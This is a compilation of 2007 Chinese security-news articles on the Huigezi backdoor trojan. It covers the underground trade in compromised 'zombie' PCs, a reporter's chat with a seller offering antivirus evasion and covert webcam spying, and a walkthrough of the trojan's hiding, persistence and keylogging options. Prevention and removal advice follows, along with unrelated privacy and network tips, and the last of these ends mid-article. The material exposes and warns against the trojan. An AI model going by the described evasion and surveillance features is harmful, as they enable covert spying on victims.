与“灰鸽子”的故事：小蔡从黑抓鸡记

与“灰鸽子”的故事：小蔡从黑抓鸡记

作者：李铁军　来源：赛迪网

网民小蔡的朋友借网络都发财了，看的小蔡严重眼红，小蔡心想，这样下去，网费都没着落了，得想个法子去弄点小钱花花。

小蔡听说最近网上鸡肉行情还不错，上去看看。一路在网上瞎逛，噫……这儿咋这好多人呢，都在买啥，看看去。

小蔡好不容易从人缝儿挤过去，怪了，咋这多卖灰鸽子的，还都只搞在线交易，出个盒子装的多简单啊，连邦店离我近，线上交易被人黑了油钱多不好。



小蔡看了看，觉得这灰鸽子不错，用起来也还蛮简单的。可惜这小子整天只知道网上泡MM，别的又不会多少，生性鲁钝的小蔡对图文并茂的灰鸽子用起来仍然觉得有些困难，咋办？网上热心人好多啊，找师傅去……



在师傅的热心教导下，小蔡的功力渐有长进，但还是遇到麻烦了。

小蔡：师傅救命呀，杀毒软件太可恶了，好不容易咱刚学会，却被肉鸡上的杀软给干掉啦。

师傅：徒弟你别怕，咱给这只灰鸽子加点花，抹上一层隐形壳，就让杀软全抓瞎，先把学费交上来。

小蔡：师傅好小气呀，教这点本事还要收钱

师傅：你以为老子容易呀，老子就靠这点本事骗钱的，要学交钱，不学滚蛋。



看来当黑客也不容易呀，小蔡忍不住交了学费**大元。“有志者事竟成呀，俺终于得手了”，小蔡得意洋洋自言自语，“想不到我还能当黑客抓鸡，咱找个地儿卖鸡去。至少把俺家的电费挣回来。要是遇到比俺还傻的小白，没准还能把学费赚回来呢。”说干就干，这不小蔡在网上支了个地摊开卖了。



生意真不错，很快几个肉鸡出手了，这个月的电费不用愁了，争取下个月把买灰鸽子的钱，拜师学艺的钱全赚回来。小蔡哼着小调，挂着QQ泡MM，心里那个美劲儿别提多高兴了。

【讨论】贴一个用灰鸽子非法牟利组织的帮规

[zt]

本帮立志于利用黑客技术赚钱的研究，任务何人都可以免费加入本帮，本帮将提供各种后续技术支持 。但加入的人必须同意以下条款：

一、不得利用所学的技术去做破坏性的活动；

二、在本帮学习后，要为本帮服务。即:学习时是免费的，但在你取得收入后就应该报答黑帮，每天上交 你的收入的15%，具体数目按当时通知为准。如有没良心的不交我们只能说很遗憾了。不知报答者必死！ ！！

三、帮里将向你提供各种黑客工具，不得外传。

四、本帮主要提供挂分赚钱的方法，只要外网的加入。

其它以通知为准。

【播报】查一下你的电脑，看你是不是成了别人的“肉鸡”

不看不知道，一看吓一跳！原以为“肉鸡”是一个美味大餐的代名词呢，谁知道现在竟成了一个行业黑话了，现在猖狂的网络黑客和它是脱不了干系啊，所以大家要警惕呀，下面转个京华时报的稿子仔细看看吧，你也查一下你的电脑，看你是不是已经成了别人的“肉鸡”了！

牟暴利催生黑色“产业”链

“肉鸡”公然卖 教程随处有

日前，记者用Google搜索“灰鸽子病毒”，搜索到约 268000 项结果；用Baidu搜索“灰鸽子病毒”，找到相关网页约548000篇，其中关于如何用灰鸽子抓“肉鸡”的教程随处可见。并且叫卖灰鸽子教程的人宣称“包教包会”。

在他们帮助下，没有任何基础的人都可以从中国13700万这一庞大的网络用户群中，轻松捕获那些疏于防范的用户，并将其变为自己的“肉鸡”。如果你恰好是疏于防范中的一员，很有可能已经成为“肉鸡”很久了。随着“灰鸽子门徒”群体增加，我们身边越来越多的人正在悄悄地变成他们的“肉鸡”。

随后记者打开百度“灰鸽子贴吧”，让人触目惊心。一台台中毒的电脑被称为“肉鸡”在网上公开叫卖，内陆“鸡”0.1元到0.4元每台，辽宁“鸡”0.5元到0.8元每台，广东“肉鸡”1元一台，港台“鸡”3元，外国“肉鸡”5元……此类信息在百度“灰鸽子贴吧”比比皆是。甚至在一些电子商务交易网站中，这些“肉鸡”的卖主们俨然是一副“诚信经营”的模样，采用诚信打分制，让买主给他们打分。

他们通过交易网站、网络支付等正当的交易手段销售从“肉鸡”上盗窃来的QQ号码、QQ币、游戏币、名人隐私资料、私人照片、私人视频等，买家和卖家的交易就这样在网上如火如荼地进行。除了倒卖“肉鸡”、销售盗窃赃物外，黑客们还操纵“肉鸡”，让“肉鸡”成为他们牟利的工具。

利益催生黑色“产业”链

发展到今天，灰鸽子已不仅仅是一个病毒这么简单。

据记者了解，2007年2月23日，灰鸽子2007 beta2版本发布。该版本的隐形性更强，可以任意插入常见的程序，比如QQ、下载工具等。其程序性能也得到提升，可以同时监视多个目标主机，并对远程监视的计算机进行如下操作：编辑注册表；上传下载文件；查看系统信息、进程、服务；查看操作窗口，记录键盘，修改共享，开启代理服务器，命令行操作，监视远程屏幕，操控远程语音视频设备，关闭、重启机器等。

由于灰鸽子采取了直接进程注入方式，利用HOOK API的方式实现病毒文件及病毒进程的隐藏，所有盗取用户信息的操作，远程计算机的操作人员可能毫不知情。

同时，据记者观察，更为可怕的是，目前，其背后已经形成了一条黑色的产业链条，任何一个网络菜鸟都可以通过购买灰鸽子病毒、拜灰鸽子高手为师而成为黑客，可以说，灰鸽子病毒演变到今天，已经催生了全民黑客时代的到来。

近日，记者通过百度贴吧联系上了几个在网上销售“灰鸽子”技术的不法分子，并通过QQ对话，从他们那里证实了相关“灰鸽子”的传闻。

网络安全　治理成难题

据反病毒专家李铁军表示，电脑病毒呈爆炸式增长，主要原因是由于随着计算机技术的普及，以及木马制作工具的泛滥，病毒变种增多病毒的制作也逐渐呈现商业化的运作。某些制作者小组甚至可以根据使用者的要求为其提供针对特定目标的专门版本。病毒程序的模块化使得病毒制作的门槛降低，很多具备一定计算机知识的用户可以根据自己的需要对其自行组合。因此2006年病毒的变种迅速增加，以典型的“灰鸽子”木马为例，高峰时期几乎每天增加10余个不同变种，迄今为止共出现了6万余种变种，并连续三年荣登国内十大病毒排行榜。

同时，随着网络越来越向真实社会靠近，流窜在互联网里的黑客或不法分子的攻击行为也更有组织性，攻击目标已经从单纯的追求“荣耀感”向获取多方面实际利益的方向转移。利用“灰鸽子”偷拍他人“裸照”勒索钱财就是其中的一个例证。但目前中国的互联网环境还不十分成熟，黑客或不法分子出于各种目的利用黑客木马工具进行网络攻击和远程控制比较普遍。

对此，有法律专家指出，中国的互联网立法比国外要落后许多。《计算机信息网络国际联网安全保护管理办法》中规定制造和传播病毒是违法的，但是对于木马、黑客程序、“流氓软件”等并没有清晰的界定。这也是黑客们在网上公开叫卖“肉鸡”而无人管的一个重要原因。

■实录

记者与贩卖灰鸽子木马技术者的对话

记者：11:09:27 你好，我想学灰鸽子。

㊣网络小虾：11:09:41 好，你有基础吗？

记者：11:10:04 没有基础，可以教会我吗？

㊣网络小虾：11:10:30 你学会了是要干吗？

记者：11:10:51 把我以前丢的QQ号码偷回来。

㊣网络小虾：11:11:55 你如果想学高级点的技术需要收钱。

记者：11:12:14 大概多少钱？

㊣网络小虾：11:12:45 看你学什么样的了，我先给你看看我的鸽子吧。

（㊣网络小虾请求您远程协助，请选择接受 还是 取消㊣网络小虾的请求。㊣网络小虾已经取消了远程协助的请求。）

记者：11:15:55 你不会给我的是病毒吧。

㊣网络小虾：11:15:59 那是远程协助，我的技术，能让你看到我的桌面。

记者：11:17:16 说实话，我现在没有工作，能利用这个赚钱吗？

㊣网络小虾：11:17:27 能，你抓的肉鸡可以卖，还可以盗QQ号卖和盗装备卖。

记者：11:18:22 哈哈，这个不错，不过好卖吗？

㊣网络小虾：11:18:58 网上有收的，有的肉鸡1只1毛，有的1只1块，什么样的都有。

记者：11:19:29 但是我从来没有学过计算机，不知道能学会吗？

㊣网络小虾：11:19:51 晕，我教的全是你这样的，只要你会打字就OK，我能教你鸽子，然后免杀，然后手动抓鸡，还有批量挂鸡，看你学什么了。

记者：11:21:17 哦，那还好，那价格是多少啊？咱先约定好价格，否则你觉得价格不合理，再把我黑了，那我就惨了。

㊣网络小虾：11:25:07 基本上鸽子和免杀你必须交钱学会，这个20元帮你搞定，生出来的病毒能过卡巴斯基和瑞星，然后一个手动抓鸡，这个抓鸡麻烦点，自己一只一只的抓，50元包你软件更新，然后是批量挂肉鸡100元，只要你开着电脑，就有肉鸡上线。我昨天下午挂了4个小时挂了90台电脑，批量挂肉鸡的话，基本上1星期上千没问题，快的话可以到5000左右，网上现在的价格是3000只100－200元，所以就算你不盗QQ和游戏号，只卖肉鸡也能把钱赚回来。基本就是这么个价格。

记者：11:26:42 谢谢，我大概几天可以学会？

㊣网络小虾：11:28:27 鸽子和免杀我给你软件，然后10多分钟能学会，手动抓鸡 30分钟左右能学会，批量挂鸡1小时以内能学会，你要是学盗QQ和刷QQ业务，价格就另算了。全部都学会基本上一下午搞定。

记者：11:35:25 对了，这个价格能学到控制别人的摄像头吗？还有能盗MSN账号和密码吗？我想利用MSN上的视频功能，偷看我在国外朋友的生活隐私能做到吗？

㊣网络小虾：11:36:56 完全可以监控，只要他有摄像头就OK。

记者：11:37:44 交20元就能学到吧。

㊣网络小虾：11:38:24 20只能学会鸽子和免杀。

记者：11:38:39免杀可以令杀毒软件对灰鸽子不起作用吗？

㊣网络小虾：11:39:13免杀之后，杀毒软件就查不出来这个是病毒了。

记者：11:39:26所有的杀毒软件都不怕了吗？

㊣网络小虾：11:39:38基本上所有的杀毒软件全部能过。

记者：11:39:57 那我需要交多少钱能学会控制摄像头呢？

㊣网络小虾：11:39:40 最起码到100元了。

记者：11:40:45 那我直接给你汇100就OK了吧？控制摄像头，我得几天能学会啊？

㊣网络小虾：11:41:13 如果现在汇款，下午包你会。

记者：11:42:12 那怎么保证我给你汇款之后，你会教我啊？

㊣网络小虾：11:42:21 这个你放心，我教N多人，就靠这个吃饭，我不教你你去baidu贴吧一骂我，我还靠什么吃饭啊，你说是不是兄弟！

记者：11:42:30 那你把账号给我啊？

㊣网络小虾：11:42:40 436742013281833××××

记者：11:42:51 好的，谢谢。

㊣网络小虾：11:44:23嘿嘿。

相信上面这段对话对于许多普通网民而言，是很难了解到在他们的生活之外竟然有一个如此完整的制造、贩卖病毒的“生态圈”。

浏览各大网络论坛，购买、出售灰鸽子木马的人比比皆是，而购买灰鸽子教程、批量出售被灰鸽子控制的“肉鸡”、企图利用灰鸽子进行不法勾当的人更是数不胜数。尤其是伴随着灰鸽子2007的推出，这种不正之风正在互联网迅速蔓延，灰鸽子的猖獗已经到了不得不管的地步！

灰鸽子木马猛增五百多变种侵扰日常生活

作者：金山　来源：赛迪网

昨天，记者从金山公司获悉，连续３年被指年度十大病毒、被反病毒专家称为最危险的后门程序“灰鸽子”，随着“灰鸽子２００７”的发布，正在集中爆发。仅今年３月１日至１３日，金山就截获了灰鸽子变种５１２个之多。



图为“灰鸽子”操作界面。资料图片

网民电脑被黑客遥控

　　今年春节，网民张小姐心中充满了恐惧。不久前，她收到了一封匿名邮件：“你和你老公的亲密照片已经全部在我手中，你的样子好诱人啊，不知道传到网上会怎么样呢？”张小姐打开邮件附件中的照片，里面确实是她本人的照片。最令她匪夷所思的是，很多照片自己和老公根本就没有拍过，对方是怎么拍到的？难道家中电脑摄像头被人开启了？

　　金山毒霸反病毒工程师李铁军分析说，上述网友隐私照片遭偷拍的事件，极有可能是黑客利用灰鸽子病毒所为。“灰鸽子”（Ｈａｃｋ．Ｈｕｉｇｅｚｉ）是一个集多种控制方法于一体的木马病毒，一旦用户电脑不幸感染，可以说用户的一举一动都在黑客的监控之下，要窃取账号、密码、照片、重要文件都轻而易举。更甚的是，他们还可以连续捕获远程电脑屏幕，还能监控被控电脑上的摄像头，自动开机（不开显示器）并利用摄像头进行录像。

　　李铁军说，自从２００１年灰鸽子问世，金山就把该病毒定为重点查杀对象。金山数据显示，截至２００６年底，“灰鸽子”木马已经出现了６万多个变种。



春节２５万台电脑成“肉鸡”

来自金山毒霸全球反病毒监测中心的数据显示，仅２００７年２月，中国约有２５８２３５台计算机感染“灰鸽子”。

蹊跷的是，“灰鸽子”本身并不具备传播性，那么“灰鸽子”大面积感染的背后到底藏着什么秘密呢？

金山反病毒专家告诉记者，“灰鸽子”自２００１年出现以来，一个制造、贩卖、销售病毒的“帝国”已经形成。中毒电脑被称为“肉鸡”，一些人利用“灰鸽子”大量“发展”肉鸡，并通过贩卖“肉鸡”获取丰厚的经济利益。



“肉鸡”交易火热进行

记者看到，“肉鸡”在网上公开叫卖，辽宁“肉鸡”每台５角到８角，广东“肉鸡”１元一台，港台的３元，外国“肉鸡”５元……据说，这是因为辽宁、广东“肉鸡”玩游戏的多，买来后能窃取更多游戏币，“肉鸡”的利用价值更高，所以价钱比国内其他城市的更贵一些。

金山方面分析，按一个普通的“灰鸽子”操控者一个月抓１０万台“肉鸡”计算，一个月就能轻松赚取至少１万元，而这还不包括窃取“肉鸡”电脑上的ＱＱ号、游戏账号、游戏币、银行账号等进行交易所获得的收入。

金山总裁雷军认为，“‘灰鸽子’已不再是一个单纯的病毒，其背后是一条制造病毒、贩卖病毒、病毒培训为一体的黑色产业链，从某种意义上讲，‘灰鸽子’的危害超出熊猫烧香１０倍！”

金山方面认为，《计算机信息网络国际联网安全保护管理办法》中规定制造和传播病毒是违法的，但是对于木马、黑客程序、“流氓软件”等并没有清晰的界定，木马制造者从而能钻法律的空子，这是法律法规有待完善的地方。

灰鸽子(Backdoor.Gpigeon)真相大揭底 专家为你实例剖析

灰鸽子真相大揭底　专家为你实例剖析

作者：李铁军　来源：赛迪网

灰鸽子，一个自诞生以来，就被各杀毒厂商一致喊打的木马程序，尽管其作者在软件许可中辩称自己是远程管理软件。

“三尺长的大砍刀，刃上带锯齿，边上有血槽，刀柄里藏着几十发暴雨梨花针，还随刀附送淬毒所需全部材料和设备，现在贴个标拿出来卖，说自己是菜刀，你还真有才~~~~”这是网友对灰鸽子2007的评价

2007年2月21日，灰鸽子2007beta2版本发布。该版本可以对远程计算机进行如下操作：编辑注册表；上传下载文件；查看系统信息、进程、服务；查看操作窗口、记录键盘、修改共享、开启代理服务器、命令行操作、监视远程屏幕、操控远程语音视频设备、关闭、重启机器等。

从功能上看，该软件的确满足了远程管理的需求。问题是，作为网管，你会用它来做远程管理软件吗？笔者电话访问了10个网管朋友，其中5个在用pcanywhere，3个用远程桌面，2个用radmin。再问你会不会使用灰鸽子做远程管理时，全部都说“不”，其中一个朋友还说，网管用灰鸽子管服务器，那就是脑袋进水。

本文简单列举一下灰鸽子客户端和服务端的功能，和真正的网管软件做个比较，试图给读者揭露灰鸽子软件的真实意图，看这个软件是否真如其作者所辩称的那样，仅是一款远程管理软件。

远程管理软件一般有服务端（被控端）和客户端（控制端）两部分组成。管理员先在需要管理的服务器上安装启用服务端程序，服务端就开启相应网络端口，等待接受客户端的指令，客户端连接服务端指定端口后即可完成远程管理任务。所有管理员都知道远程管理的风险，只有具备远程管理权限的客户端才能正常建立连接。并且，所有的管理操作，在服务端，都会提供连接日志，以便管理员进行管理维护。有兴趣的朋友尽可以拿windows远程桌面和PcAnyWhere来试验。

而灰鸽子服务端，不是等待客户端连接，而是系统一启动，服务端就会去自动上线连接控制端，控制端的操作人员随时可以完成他想要的操作，而这一切，服务端的管理员可能毫不知情。

配置服务端自动上线



图1

服务端程序运行后自行删除，并且可以选择完全隐藏服务端图标，即使有服务端图标，和其它正常的远程管理软件不同的是，这个图标完全没有任何用处，你只是知道它存在而已，想关闭也很难办。

配置即将种植在肉鸡上的病毒名



图2

配置病毒自动加载启动项

服务名称可任意定制，这意味着非常多的人会被虚假信息蒙骗，这一项可以取消，这样配置出来的服务端，运行msconfig进行启动项管理，也不会发现木马的痕迹。



图3

配置代理服务器

这样，中灰鸽子的机器就不明不白的为第三方提供网络连接服务了。使用代理服务器作跳板对第三方目标发起攻击，是黑客最爱干的事儿，一旦有人追查，这些代理服务器，就成了真正黑客的替罪羊。



图4

配置隐藏选项

如下设置后，能有几个人发现被安装木马了呢。这绝对不是一个正常的远程管理软件应该具有的功能，那谁真正需要它呢？读者想想就清楚了。



图5

配置最终生成的程序图标

都很熟悉吧，看到用这些图标做掩护的文件，相信不少人想都不想，就双击了吧。



图6

插件功能

可用来捆绑第三方软件，比如流氓软件



图7

奇怪的是，这个辩称自己是远程管理软件的东东，在服务端却没有任何与访问权限和日志记录等管理软件必备的功能设置。真正的网管软件，服务端不需要日志记录吗？

接下来，我们再看灰鸽子客户端想要控制什么。

服务端启动后，客户端立即发现目标主机自动上线，意味着客户端可以为所欲为了



图8

直接操作肉鸡电脑文件

可以任意操作目标主机上的文件，上传下载，删除修改，看中什么就拿什么。



图9

远程控制命令组

有更多的功能可以操作，远程控制命令组，可以查看远程主机的系统信息、剪切板、进程、窗口、键盘记录器、服务、共享、模拟命令行操作、设置代理服务器和启动插件。下面这个是启用键盘记录器的记录。想想，如果目标主机的操作人员正在和某个MM聊天，或者正登录网络游戏，你的每个击键动作，都在别人的眼皮底下。



图10

远程编辑注册表

上传个有害程序，修改目标主机注册表，让这个程序自动加载，和操作你本地的注册表一样容易。



图11

命令广播功能

控制端可以把控制命令一次性广播到若干台计算机，如果一个攻击都利用灰鸽子组成了一个僵尸网络，用这个功能就可以同时完成一个特定的任务了。任务完成还可以立即远程卸载服务端，达到毁尸灭迹的效果。



图12

远程桌面

是远程管理软件的基本功能，注意和windows的远程桌面比较一下，你会发现，客户端是不需要提供任何登录凭据的，想来就来，不用和门卫打招呼。

远程Telnet

和你在远程计算机上执行命令行是完全一样的，而这时候你去检查服务端计算机上的telnet服务，实际上仍是关闭着，灰鸽子自己设计了一个远程命令行工具。即使远程计算机的所有者禁用了telnet仍然无忌于事。



图13

远程控制摄像头

这是灰鸽子开发者设计的最变态的功能，完全满足了部分偷窥狂人的欲望。可以控制远程计算机的摄像头，在服务端操作人员完全不知情的情况下，控制端可以把摄像头目标中的拍摄下来。机房里的服务器需要摄像头吗？



图14

看到这里，所有人都明白了灰鸽子到底想干什么，它是远程控制软件吗？它到底为谁开发的？程序员的智慧应该用在什么地方？灰鸽子不是其作者辩称的远程控制软件，是个彻头彻尾的恶意木马。

灰鸽子拒认病毒身份辩称是远程管理软件

作者：李铁军　来源：赛迪网

用Google检索“灰鸽子病毒”，检索到约 268,000 项结果；用Baidu检索“灰鸽子病毒”，找到相关网页约548,000篇。灰鸽子自诞生之日起，就被反病毒专业人士判定为最具危险性的后门程序。2004-2006年，连续三年荣登国内10大病毒排行榜。

就是这样一个极度危险的程序，其开发者在使用许可中辩称自己是远程管理软件，有可能被部分杀毒软件误认作后门程序查杀，建议使用前关闭杀毒软件，否则将不能正常使用该软件的功能。

据金山反病毒中心提供的数据，金山毒霸截获的灰鸽子变种数量已经超过6万个，每一家杀毒软件厂商在得到灰鸽子新样本后，就会毫不犹豫地将其纳入新的查杀目标。如果一个正常的软件，一旦被反病毒产品判定为病毒，其开发者会第一时间要求反病毒公司修正其错误。而灰鸽子的作者从来没有，而是不断推陈出新，同全球反病毒产品持续对抗达5年之久，并且丝毫没有放弃的迹象，这极其不寻常。

毒霸最早截获灰鸽子是在2001年，功能相对简陋，病毒化的趋势也不甚明显。随着其版本的不断更新，病毒化特征日趋显著，利用HOOK API的方式实现病毒文件及病毒进程的隐藏，不是有经验的人，很难发现中了灰鸽子。2007年2月21日，灰鸽子2007beta2版本发布。该版本可以对远程计算机进行如下操作：编辑注册表；上传下载文件；查看系统信息、进程、服务；查看操作窗口、记录键盘、修改共享、开启代理服务器、命令行操作、监视远程屏幕、操控远程语音视频设备、关闭、重启机器等。而这所有操作，远程计算机的操作人员可能毫不知情。

登录www.virustotal.com，把灰鸽子2007生成的服务端上传，有以下国外软件报告发现病毒：



使用国产反病毒软件检测结果：

金山：Win32.Hack.Huigezi.nl.713216

江民：Backdoor/Huigezi.jv.hook

瑞星：Backdoor. Gpigeon.2007.b

【支招】“灰鸽子”完整猎杀方案

2007年03月14日来源：京华时报记者：孙尚伟

　　怎么预防“灰鸽子”

　　灰鸽子自身并不具备传播性，一般通过网页、邮件、IM聊天工具、非法软件四种途径进行传播。

　　网页传播是指病毒制作者将灰鸽子病毒植入网页中，用户浏览即感染；邮件传播是指灰鸽子被捆绑在邮件附件中进行传播；IM聊天工具传播是指通过即时聊天工具传播携带灰鸽子的网页链接或文件；非法软件传播是指病毒制作者将灰鸽子病毒捆绑进各种非法软件，用户下载解压安装即感染。

　　灰鸽子病毒泛滥已经数年，变种数万，因为病毒具备很好的隐形特性，让人防不胜防。日前记者采访了金山、瑞星、江民等杀毒厂商，他们建议网友在使用电脑时应注意以下几点：

　　1.注意安装IE浏览器的补丁程序，很多灰鸽子是攻击者故意把病毒放在带漏洞攻击程序的网站上，有漏洞的机器访问这些网站就会中毒。

　　2.及时升级杀毒软件，使用盗版杀毒软件（或者一个正版ID用在多台计算机上）是不能正常升级的，特别需要检查。

　　3.对朋友或陌生人发送来的可疑程序不要运行，别被对方的谎言蒙骗。

　　4.关闭所有磁盘的自动播放功能，避免插入带毒U盘、移动硬盘、数码存储卡中毒。

　　如何猎杀“灰鸽子”

　　由于灰鸽子本身的隐蔽性很强，用Windows系统自带的工具，很难发现灰鸽子入侵。那我们如何去发现电脑中已经被植入的灰鸽子病毒呢？一般而言大家可采用杀毒软件将 “灰鸽子”病毒查杀掉，但是由于“灰鸽子”不断变种，因此大家需要经常更新，而且即使更新也难以跟上“灰鸽子”的变种速度。所以，电脑用户还可以去下载一些专杀工具，如果即使下载专杀工具仍无法完全清除“灰鸽子”的话，建议电脑用户可采用手工杀毒的办法来清除“灰鸽子”木马程序。

　　手工杀毒办法

　　手工杀毒需要借助工具软件：冰刃。无法根据进程列表看出哪个是病毒时，可以启动冰刃，同时打开任务管理器比较一下，冰刃里多出的进程可能就是灰鸽子病毒。进程名如果是假冒word、记事本的图标，需要重点关注（如图一）。





　　选中G_server2007进程，单击右键，结束进程（如图二），然后直接根据提示点左边的文件，浏览到上图程序名称提示的文件夹，找到g_server2007.exe和g_server2007.DLL（中毒后的文件名由攻击者定制，各不相同，应尽可能根据冰刃提示的路径去查找。有的版本带有_hook.dll，可以查看文件日期，应该是同时生成的。）点击右键，彻底删除即可。





　　■链接

　　“灰鸽子”身世

　　2004年、2005年、2006年，“灰鸽子”木马因为连续三年被国内各大杀毒厂商评选为年度十大病毒而声名大噪，逐步成为媒体以及网民关注的焦点。自2001年出现至今，灰鸽子主要经历了模仿期、飞速发展期以及全民黑客时代三大阶段。

　　“灰鸽子”最初主要模仿“冰河”木马，早期并未以成品方式发布，更多的是以技术研究的姿态，采用源码共享的方式出现在互联网。由于名气不及“冰河”，当时只出现了少量的感染，但其开放源码的方式也使其传播量逐渐增大。

　　因为源码开放，“灰鸽子”的版本越来越多。当时，大部分安全厂商将对用户上报和监测到的“灰鸽子”服务端都认定为“黑客程序”，并坚决查杀，在一定程度上遏制了灰鸽子的发展速度。

　　2004年至2005年，大量的商业动作实现了互联网化，电子商务成为普通网民进行消费的选择之一，网络游戏在中国大地全面开花。在这样的情况下，大量通过IM（即时通讯软件）传播的木马和病毒不择手段地从用户系统中盗取网银账号、网游账号及密码，给中国互联网提出了新的挑战。灰鸽子也逐步进入成熟期，大量变种在互联网中衍生。

使用搜索引擎时也要注意保护自己隐私

使用搜索引擎时也要注意保护自己隐私

作者：hackmaster　来源：赛迪网安全社区

我们在开始接触互联网的时候都听说过一句谚语，“在互联网上没有人知道你是一条狗”。互联网的匿名性保护了用户的信息和网络使用安全，然而我们也常常能在各种媒体里面了解到发生在互联网上的侵犯隐私的恶性事件。当前对用户的隐私威胁最大的不是用于跟踪用户的Cookie、间谍软件和用户浏览行为分析网站，而是我们日常使用的搜索引擎。大部分搜索引擎在用户使用其服务时，都会记录用户的IP地址、搜索的关键词、从搜索结果中跳转到哪个网站等信息，通过数据挖掘等技术，搜索服务商可以从这些信息中获得用户的身份、用户的爱好以及在网上的行为等隐私信息，并可能使用这些隐私信息进行商业活动。

　　因为存在隐私威胁而放弃搜索引擎既不现实也不明智，搜索引擎在我们的网络活动中正扮演着越来越重要的角色。那如何保护用户在使用搜索引擎服务时的隐私？笔者整理了一些经过实践的经验，用户在使用搜索引擎时可以根据情况选用：

一、 不要登陆到搜索引擎或者搜索引擎提供的工具

　　现在许多搜索引擎提供了个性化的搜索服务，这在很大程度上方便了用户，但同时也留下了侵犯用户隐私的隐患。用户登入在搜索引擎上注册的账户后，搜索引擎可以更容易的根据用户的注册信息对用户的搜索记录和搜索行为进行跟踪，并按照这些收集到的用户资料形成用户的网络活动档案。建议用户在单纯使用搜索引擎时，不要登陆到搜索引擎的账户服务中，如果要使用搜索服务商提供的其他服务时，比如在使用Google提供的Gmail服务，不要同时使用Google进行搜索。

　　如果是使用同时使用多浏览器的用户，还可以使用稍微麻烦一点的方法：一个浏览器用来登陆搜索引擎账户来使用搜索服务商的其他服务，另外一个浏览器只用来使用搜索引擎的搜索服务。如果是Firefox的用户，还可以使用Firefox的个人档案（Profile）功能来达到分离使用搜索服务商的服务的目的，具体方法是使用Firefox.exe –ProfileManager 来启动Firefox的档案管理器，然后创建和使用多个Profile来保证可以分离使用搜索服务商提供的服务

二、 阻止Google对隐私信息的收集

　　Google是用户使用范围最广的搜索引擎，换句话说，我们需要对使用Google进行搜索时的隐私保护进行更多关注。一个简单的办法是在使用Google前先清空机器上保存的Cookie文件，但由于Cookie还保存了用户在其他网站的有用信息，这个方法的可行性并不太强。更简单的方法是通过设置浏览器来阻止Google对Cookie的访问。

　　使用IE浏览器的用户可以在工具菜单 -> Internet选项 ->隐私标签页里面找到一个叫做“站点”的按钮，选中后把www.google.com 添加到Cookie的拒绝列表中，确定退出。

　　使用Firefox浏览器的用户可以在工具菜单 -> 选项 ->隐私 的“接受站点的Cookie”选项旁边的“例外”中，将www.google.com加入到阻止列表。

　　用户这样设置浏览器后，在使用Google的搜索服务时，Google站点就不能在用户的机器上保存Cookie，也就不能通过Cookie跟踪用户的搜索记录。不过要注意一点，因为这样阻止了Google站点的Cookie，因此Google提供的Gmail等其他服务同样也无法使用。

　　用户在使用Google提供的RSS阅读器Google Reader、或者Google讨论组时，用户也需要登入自己的Google账户，因此，Google也会通过这些途径收集用户对新闻、讨论话题的爱好等信息，用户使用这些服务时应留意。

三、 定期更换IP地址

　　搜索服务商还会根据用户搜索时的连接IP，结合用户的搜索内容来组织收集到的用户信息，通过定期更换IP地址的方法即可解决这个问题。使用xDSL拨号接入的用户，只需要定期断开并重新拨号，就可以更换连接的IP地址。对于使用静态IP的个人或组织用户，可以考虑使用Tor、VPN等加密连接工具，或者选择互联网上的公开代理服务器。

四、 使用不保存用户信息的搜索引擎

　　用户在进行一般信息的搜索时，还可以使用不保存用户搜索相关信息的搜索引擎，Ixquick 搜索引擎(www.ixquick.com)是个不错的选择，它有中文版本，对中文网站支持还不错。它承诺在48小时内删除用户搜索的所有痕迹，因此用户不用担心自己的搜索信息被用于其他用途。

五、 不要在搜索关键词中包含自己的个人信息

　　绝大部分用户都搜索过自己的名字、个人信息等，想看看在互联网上能找到什么有关自己的信息——但是从保护隐私信息的角度来说，这是很有害的：首先，搜索引擎可以很容易的通过用户所包含在搜索关键字里面的姓名等个人信息来组织成用户的网络活动档案，如果是用户在搜索引擎搜索自己的电话号码、身份证号码等敏感信息时，还会给不法分子使用社会工程学进行欺诈提供了可乘之机。

　　因此，用户请勿在使用搜索引擎时，在搜索关键词中包括自己的个人信息。

六、 搜索敏感信息时使用公共无线接入服务或代理服务器

　　如果用户需要使用搜索引擎进行敏感信息的搜索，建议用户通过公共场所的无线接入服务（Hot spot）或者使用公开的代理服务器进行，而不应该在家里或工作的地方。这样可以防止搜索引擎保存并利用用户所搜索的敏感信息和用户的接入地址等应该保密的信息。要注意的是，使用公共无线接入服务或代理服务器时，要确定不需要进行涉及用户个人信息的登陆操作。

七、 不要使用你的ISP提供的搜索服务

　　通常用户的互联网接入提供商（ISP）会给用户提供一系列的互联网相关服务，比如Email、文件下载、搜索等。因为ISP保存有用户的注册信息、登陆的IP等，ISP结合用户的搜索内容即可跟踪用户的网络活动,因此笔者建议用户不要使用ISP所提供的搜索服务进行信息搜索，按照上述的建议使用公开的搜索服务即可。

图片成当前垃圾信息传播又一藏身之所

作者：hackmaster　来源：赛迪网安全社区

安全服务提供商赛门铁克日前公布了今年二月份互联网病毒发作情况。赛门铁克称，二月份与赌博相关的垃圾信息大幅度上升，成人垃圾信息所占比例降低到了历史最低点。

赛门铁克的统计报告显示，与以往色情垃圾信息漫天飞局面不同的是，在今年二月份里色情垃圾信息降低到了历史最低点，垃圾信息集中在了健康产品和其他产品上。

另外，二月份垃圾信息还呈现了一定的地域性特点，比如，与赌博相关的垃圾信息出现了德语、意大利语、法语版本，而此前大多仅仅是英语版本。

在所有的垃圾信息当中，色情信息仅仅占据了其中的3%。在赛门铁克所监控的所有电子邮件当中，70%的为垃圾信息，而最初在北美市场上垃圾邮件的比例为50%。

随着邮件过滤和阻止技术的不断升级，促使攻击黑客的反过滤、反阻挡技术也不断更新，它们放弃了原来传统的病毒携带方法，采用了更为隐蔽的手段。二月份的报告显示，38%的垃圾信息是通过图片方式传播的，这种传播方式限制了安全软件的过滤及阻止功能的发挥，增加发垃圾信息的工作难度，对于某些垃圾信息甚至只能眼睁睁地看着它们通过滤软件。

赛门铁克称，垃圾信息发送者选用先进技术的同时，并没有放弃原来的文本上传或者下载方式，因为文本格式的垃圾信息夹杂在图片文件当中，可以逃过光电识别系统的检查。

巧妙利用三招保护局域网中的 IP 地址

巧妙利用三招保护局域网中的 IP 地址

作者：ucwvfpwxf　来源：赛迪网安全社区

局域网中IP地址被占用或篡改的情况时有发生,为你提供几个实用招数。

停用网络连接服务

要限制用户随意修改TCP/IP参数，最简单的方法是让用户无法打开TCP/IP参数设置窗口。打开“开始”中“运行”输入“services.msc”命令，选中“Network Connections”服务，右键单击，从属性中选择其中的停用按钮，将“启动类型”选为“已禁用”，并确定。这样，你如果从“开始”进入“网络连接”里，就找不到“本地连接”图标。这也会给自己网络参数修改带来麻烦，可以将“Plug and play”服务停用，就不影响你正常网络访问了

限制修改网络参数法

